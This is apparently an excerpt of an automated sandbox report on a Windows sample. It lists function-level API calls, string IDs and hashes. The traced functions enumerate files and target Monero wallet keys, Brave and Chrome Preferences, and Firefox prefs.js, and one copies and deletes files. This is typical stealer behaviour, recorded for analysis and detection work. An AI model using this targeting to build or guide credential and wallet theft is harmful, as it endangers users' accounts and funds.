                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: ce57555c6ab22243723d09dca8cad7823b09013ee4f57e033f75ccff8480d6e4
                                    • Instruction ID: 9868d1ade751ac1211af58de03dec72ac70c36a81474a680ae97110ac352e067
                                    • Opcode Fuzzy Hash: ce57555c6ab22243723d09dca8cad7823b09013ee4f57e033f75ccff8480d6e4
                                    • Instruction Fuzzy Hash: AEA18DB2A40208ABDB34DFA4DC85FEA73BCBF88300F044598A51D96145EB759BC4DF62
                                    Function 00FABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00FC0B32,00FC0B2B,00000000,?,?,?,00FC13F4,00FC0B2A), ref: 00FABEF5
                                    • StrCmpCA.SHLWAPI(?,00FC13F8), ref: 00FABF4D
                                    • StrCmpCA.SHLWAPI(?,00FC13FC), ref: 00FABF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAC7BF
                                    • FindClose.KERNEL32(000000FF), ref: 00FAC7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 9525a00c76a27d9fe660abac8db1ee94eada88169dc4d76528f9bd8e8fdd14d3
                                    • Instruction ID: 22999fc783552ac85fb610dfacc4b55ababfad84fd554103977f43b07373dc23
                                    • Opcode Fuzzy Hash: 9525a00c76a27d9fe660abac8db1ee94eada88169dc4d76528f9bd8e8fdd14d3
                                    • Instruction Fuzzy Hash: 05422572910108ABDB14FBB1DD96EED737DAF94300F404568B50A97181EF389B49EFA2
                                    Function 00FB4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FB492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB4943
                                    • StrCmpCA.SHLWAPI(?,00FC0FDC), ref: 00FB4971
                                    • StrCmpCA.SHLWAPI(?,00FC0FE0), ref: 00FB4987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB4B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00FB4B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 4ab6c30cce88f4518393de65b432b38b9464cb3d4455c984213a60952bf5d66b
                                    • Instruction ID: 3fc7cafd822016eff3b216d27c90d7484e0563d093071b9535f73d67d9cbb02c
                                    • Opcode Fuzzy Hash: 4ab6c30cce88f4518393de65b432b38b9464cb3d4455c984213a60952bf5d66b
                                    • Instruction Fuzzy Hash: 066152B5900218ABCB24EBE0ED45FEA73BCBF48701F04859CB51996045EB35EB85DF91
                                    Function 00FB4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FB4580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4587
                                    • wsprintfA.USER32 ref: 00FB45A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB45BD
                                    • StrCmpCA.SHLWAPI(?,00FC0FC4), ref: 00FB45EB
                                    • StrCmpCA.SHLWAPI(?,00FC0FC8), ref: 00FB4601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB468B
                                    • FindClose.KERNEL32(000000FF), ref: 00FB46A0
                                    • lstrcat.KERNEL32(?,008CEB18), ref: 00FB46C5
                                    • lstrcat.KERNEL32(?,008CDCA0), ref: 00FB46D8
                                    • lstrlen.KERNEL32(?), ref: 00FB46E5
                                    • lstrlen.KERNEL32(?), ref: 00FB46F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: ce8ce5ecbd2271803afcdb176d4cbba365474c62c37751d0b2d3f957175bb5d1
                                    • Instruction ID: fbbcc11dd60d53751f109d140fde861eac04963294082adf04d124190cb586cd
                                    • Opcode Fuzzy Hash: ce8ce5ecbd2271803afcdb176d4cbba365474c62c37751d0b2d3f957175bb5d1
                                    • Instruction Fuzzy Hash: A35173B5940218ABCB34EBF0EC89FE973BCAF58700F404598B61996084EF749AC5DF91
                                    Function 00FB3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FB3EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB3EDA
                                    • StrCmpCA.SHLWAPI(?,00FC0FAC), ref: 00FB3F08
                                    • StrCmpCA.SHLWAPI(?,00FC0FB0), ref: 00FB3F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB406C
                                    • FindClose.KERNEL32(000000FF), ref: 00FB4081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 9ed6cfab4bf9afab1944ec20d1e735b43a99f7448adb504389572669ad6ddb70
                                    • Instruction ID: 199286c3bd0ceb7579f460eea39b1f02b1157a340f8bfccc90bce8309aee44c6
                                    • Opcode Fuzzy Hash: 9ed6cfab4bf9afab1944ec20d1e735b43a99f7448adb504389572669ad6ddb70
                                    • Instruction Fuzzy Hash: 9E5153B6900218ABCB24EBF0DC85EEA77BCBF48700F00459CB65996044DB75EB89DF51
                                    Function 00FAED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FAED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FAED55
                                    • StrCmpCA.SHLWAPI(?,00FC1538), ref: 00FAEDAB
                                    • StrCmpCA.SHLWAPI(?,00FC153C), ref: 00FAEDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAF2AE
                                    • FindClose.KERNEL32(000000FF), ref: 00FAF2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 8cadf177a2e81e0488ee42bb905c7d2c6bc2d014f188b96cff09cbe27becaea7
                                    • Instruction ID: 9ca700953923e8829f0f303194d6bb424edc646dadc8dcc1c82ff919646081d2
                                    • Opcode Fuzzy Hash: 8cadf177a2e81e0488ee42bb905c7d2c6bc2d014f188b96cff09cbe27becaea7
                                    • Instruction Fuzzy Hash: FBE12971911118AAEB64FB61DC52EEE737CAF54300F4041E9B40B62492EF34AF9AEF51
                                    Function 00FAF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FC15B8,00FC0D96), ref: 00FAF71E
                                    • StrCmpCA.SHLWAPI(?,00FC15BC), ref: 00FAF76F
                                    • StrCmpCA.SHLWAPI(?,00FC15C0), ref: 00FAF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00FAFAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 7d099760f027b661fdbd033229427076eb4709d062d8d5eff87627f26fa7c152
                                    • Instruction ID: 04be0f1be410a6fb247e9008321b7b5da176fd5663be0c128986e210a448186f
                                    • Opcode Fuzzy Hash: 7d099760f027b661fdbd033229427076eb4709d062d8d5eff87627f26fa7c152
                                    • Instruction Fuzzy Hash: 22B16B71900108ABDB24FF61DC96FED7379AF55300F5085A8E40A9B181EF349B49EF92
                                    Function 00FA16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FC510C,?,?,?,00FC51B4,?,?,00000000,?,00000000), ref: 00FA1923
                                    • StrCmpCA.SHLWAPI(?,00FC525C), ref: 00FA1973
                                    • StrCmpCA.SHLWAPI(?,00FC5304), ref: 00FA1989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FA1D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FA1DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FA1E20
                                    • FindClose.KERNEL32(000000FF), ref: 00FA1E32
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 039b1dbd0a10341615f76aa08b48814cdfafbdad4ea86427f733e59b18253dff
                                    • Instruction ID: 85aa882e2c0df15d1a6b57a09792a9e975f5bd76a56c54788d568c3441710858
                                    • Opcode Fuzzy Hash: 039b1dbd0a10341615f76aa08b48814cdfafbdad4ea86427f733e59b18253dff
                                    • Instruction Fuzzy Hash: 52121771910118BBDB25FB61DCA6EEE737CAF54300F404199B10666091EF38AF89EF91
                                    Function 00FADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00FC0C2E), ref: 00FADE5E
                                    • StrCmpCA.SHLWAPI(?,00FC14C8), ref: 00FADEAE
                                    • StrCmpCA.SHLWAPI(?,00FC14CC), ref: 00FADEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAE3E0
                                    • FindClose.KERNEL32(000000FF), ref: 00FAE3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 17cf6ff71151e919e80bc7134d633107d6fce47ec9622f4294bf03645823c6ed
                                    • Instruction ID: 3ad890fe60311bc6594d85f12315a408fd14bf8834eaee2b5e58d1d049561dca
                                    • Opcode Fuzzy Hash: 17cf6ff71151e919e80bc7134d633107d6fce47ec9622f4294bf03645823c6ed
                                    • Instruction Fuzzy Hash: 5CF1E671814118AADB29FB61DCA6EEE7378BF15300F8041D9B01B62491EF346F9AEF51
                                    Function 00FADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
